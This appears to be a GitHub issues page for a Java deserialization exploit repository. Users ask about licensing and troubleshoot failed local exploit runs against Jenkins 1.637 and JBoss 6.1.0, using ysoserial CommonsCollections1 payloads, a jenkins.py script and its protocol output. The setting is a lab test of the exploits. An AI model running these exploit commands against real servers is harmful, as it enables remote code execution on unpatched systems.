breenmachine / javaunserializeexploits Goto Github PK

It would be nice to have an explicit license to know if the author is ok with reuse and the requirement for staying open-source. The license could be MIT for easy compatibility.

I reuse the exploits published in this repo for a scanner. I will use the same license.
https://github.com/GoSecure/break-fast-serial

I download the deb package of jenkins version 1.637 and install it in my Kali Linux.Then I start the service jenkins and check the status of jenkins.
I do the following exploit in the local:
Step One :
Use the tool - ysoserial to create the payload.

# java -jar ysoserial-0.0.4-all.jar CommonsCollections1 'touch /tmp/pwned' > payload

Step Two:

# python jenkins.py localhost 8080 ../../payload
connecting to localhost port 39968
sending "Protocol:CLI-connect"
received "Welcome
"
received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
sending payload...

Then check the existing of /tmp/pwned.
But sadly, I don’t see this file. Is there any problem when I do my exploit?

I set up jboss-6.1.0.Final, which is mentioned in your blog.

Then use Burp Repeater to forward the request file in your repo to 127.0.0.1:8080. The response tab is likely the same with the picture in your blog. However, I can't find the exist of /tmp/pwned, which is result of touch /tmp/pwned. Is this request just a proof and this vulnerability cannot be exploit?

And another question, from the result of grep -R InvokerTransformer ., the library version is 3.2, not 3.1 and not vulnerable. From README in ysoserial, ysoserial could not exploit this vulnerability.